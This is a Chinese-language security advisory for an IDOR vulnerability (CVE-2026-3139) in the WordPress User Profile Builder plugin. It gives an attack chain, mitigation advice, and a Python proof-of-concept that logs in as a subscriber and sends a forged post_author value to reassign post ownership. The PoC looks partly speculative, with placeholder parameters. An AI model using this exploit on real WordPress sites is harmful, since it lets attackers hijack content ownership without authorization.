CVE-2026-3139 CVSS 4.3 中危

CVE-2026-3139: WP User Profile Builder IDOR漏洞

披露日期: 2026-03-31

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-3139

漏洞类型

不安全的直接对象引用 (IDOR)

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

WordPress User Profile Builder插件

漏洞概述

WordPress插件User Profile Builder在3.15.5及之前版本中存在不安全的直接对象引用（IDOR）漏洞。该漏洞源于`wppb_save_avatar_value()`函数缺少对用户控制密钥的验证。拥有订阅者及以上权限的已认证攻击者可以利用此漏洞，通过修改'post_author'参数，重新分配任意文章和附件的所有权，导致数据完整性受损。

技术细节

该漏洞位于User Profile Builder插件的`wppb_save_avatar_value()`函数中。当插件处理用户头像保存请求时，未对传入的`post_author`参数进行严格的权限校验和所有权验证，直接将其用于更新数据库。攻击者只需拥有WordPress站点的最低权限（如订阅者），即可构造恶意请求向该函数发送数据。通过篡改请求中的`post_author`字段为目标用户ID，攻击者可以将系统中任意文章或附件的作者更改为指定用户（如管理员），从而非法获取内容控制权，破坏数据的完整性和归属关系。

攻击链分析

STEP 1

攻击者注册或使用已有的低权限账户（如订阅者Subscriber）登录WordPress站点。

STEP 2

攻击者识别想要劫持的文章ID（Post ID）和目标用户ID（通常是管理员ID）。

STEP 3

攻击者向`wppb_save_avatar_value`函数发送特制的请求，在请求中插入或修改`post_author`参数为目标用户ID。

STEP 4

服务器端未验证当前用户是否有权修改该文章的作者，直接处理请求，将文章所有权转移给目标用户。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target configuration
target_url = "https://example.com/wp-admin/admin-ajax.php"
username = "subscriber_user"
password = "password123"

# 1. Authenticate as a low-privileged user (Subscriber)
session = requests.Session()
login_payload = {
    "log": username,
    "pwd": password,
    "redirect_to": "https://example.com/wp-admin/",
    "wp-submit": "Log In"
}
session.post("https://example.com/wp-login.php", data=login_payload)

# 2. Exploit the IDOR vulnerability
# The vulnerable function wppb_save_avatar_value() accepts a post_author parameter
# without checking if the current user owns the post or has permission to change it.
exploit_payload = {
    "action": "wppb_save_avatar_value", 
    "post_id": "123",                   # ID of the target post to hijack
    "post_author": "1",                 # ID of the target user (e.g., Admin)
    "meta_data": "some_value"           # Other required parameters by the function
}

response = session.post(target_url, data=exploit_payload)

if response.status_code == 200:
    print("[+] Exploit successful! Post author likely changed.")
else:
    print("[-] Exploit failed.")

影响范围

User Profile Builder <= 3.15.5

防御指南

临时缓解措施

建议立即检查并更新User Profile Builder插件到最新版本。如果无法立即更新，应暂时禁用该插件以防止漏洞被利用。此外，管理员应审查站点中文章和附件的所有权变更记录，以确认是否已被攻击。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表